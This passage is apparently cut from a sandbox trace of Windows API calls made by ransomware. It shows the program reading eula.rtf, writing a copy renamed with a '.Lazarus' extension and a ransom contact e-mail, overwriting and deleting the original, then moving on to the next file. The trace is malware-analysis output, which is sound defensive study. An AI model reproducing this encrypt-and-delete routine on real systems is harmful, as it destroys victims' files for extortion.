[0072.464] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.465] CloseHandle (hObject=0x418) returned 1 [0072.465] AreFileApisANSI () returned 1 [0072.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0072.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0072.465] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.465] GetFileType (hFile=0x418) returned 0x1 [0072.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.465] CloseHandle (hObject=0x418) returned 1 [0072.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0072.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0072.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0072.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0072.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.466] AreFileApisANSI () returned 1 [0072.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0072.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0072.466] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5)) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0072.466] AreFileApisANSI () returned 1 [0072.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0072.467] GetLastError () returned 0x0 [0072.467] SetLastError (dwErrCode=0x0) [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0072.467] GetLastError () returned 0x0 [0072.467] SetLastError (dwErrCode=0x0) [0072.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69170 [0072.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0072.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0072.467] AreFileApisANSI () returned 1 [0072.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0072.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x80a30 [0072.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0072.467] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.469] GetFileType (hFile=0x418) returned 0x1 [0072.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.469] AreFileApisANSI () returned 1 [0072.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0072.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0072.470] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.470] GetFileType (hFile=0x410) returned 0x1 [0072.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0072.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0072.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.470] GetLastError () returned 0x0 [0072.470] SetLastError (dwErrCode=0x0) [0072.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.470] GetLastError () returned 0x0 [0072.470] SetLastError (dwErrCode=0x0) [0072.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.470] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0072.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0072.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.472] GetLastError () returned 0x0 [0072.472] SetLastError (dwErrCode=0x0) [0072.472] GetLastError () returned 0x0 [0072.473] SetLastError (dwErrCode=0x0) [0072.473] GetLastError () returned 0x0 [0072.473] SetLastError (dwErrCode=0x0) [0072.473] GetLastError () returned 0x0 [0072.473] SetLastError (dwErrCode=0x0) [0072.473] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x8a5, lpOverlapped=0x0) returned 1 [0072.473] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.474] GetLastError () returned 0x0 [0072.474] SetLastError (dwErrCode=0x0) [0072.474] GetLastError () returned 0x0 [0072.474] SetLastError (dwErrCode=0x0) [0072.474] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.474] GetLastError () returned 0x0 [0072.474] SetLastError (dwErrCode=0x0) [0072.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5) returned 0x7cf20 [0072.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0072.475] GetLastError () returned 0x0 [0072.475] SetLastError (dwErrCode=0x0) [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0072.475] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x8b0, lpOverlapped=0x0) returned 1 [0072.475] GetLastError () returned 0x0 [0072.475] SetLastError (dwErrCode=0x0) [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.475] GetLastError () returned 0x0 [0072.475] SetLastError (dwErrCode=0x0) [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0072.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.475] CloseHandle (hObject=0x418) returned 1 [0072.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.476] CloseHandle (hObject=0x410) returned 1 [0072.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.476] AreFileApisANSI () returned 1 [0072.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0072.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0072.477] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.478] GetFileType (hFile=0x410) returned 0x1 [0072.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0072.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.478] GetLastError () returned 0xb7 [0072.478] SetLastError (dwErrCode=0xb7) [0072.478] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.479] CloseHandle (hObject=0x410) returned 1 [0072.479] AreFileApisANSI () returned 1 [0072.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0072.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0072.479] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 1 [0072.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0072.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.481] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0072.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.482] AreFileApisANSI () returned 1 [0072.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0072.482] AreFileApisANSI () returned 1 [0072.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0072.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0072.482] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.483] GetFileType (hFile=0x410) returned 0x1 [0072.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.483] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, 